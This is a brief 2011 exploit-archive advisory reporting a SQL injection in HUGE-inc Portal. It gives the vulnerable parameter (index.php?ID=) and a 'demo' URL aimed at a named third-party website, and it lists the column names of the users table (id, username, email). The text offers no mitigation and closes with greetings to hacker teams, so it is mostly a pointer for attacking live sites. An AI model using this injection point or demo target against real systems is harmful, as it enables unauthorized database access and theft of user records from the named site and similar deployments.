HUGE-inc Portal suffers from a remote SQL injection vulnerability.
5f9954670e00e9f0e1ac035f84b2c5f6298123e4e8f83ca50d854cf3430d90a4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Title : HUGE Sql Injection vulnerability
[+]Vender : http://www.hugeinc.com
[+]Auther : Bl4ck.Viper [Turkish Hacker]
[+]Email : Bl4ck.Viper@gmail.com
[+]Date : 05/07/2011
[+]Home : www.skote-vahshat.com
[+]MyArchive : www.xpl.skote-vahshat.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Err0r 0n : index.php
Exploit :
http://target.com/index.php?ID=[SQL]
Demo :
http://www.greenbergresearch.com/index.php?ID=1'
table of users : users
columns of users table:
id
username
email
...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spc TNX :
OF All my friends.
TBH Team And All Iranian & Turkish Hackerz
Yashasin Benim Ana Yurdum
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~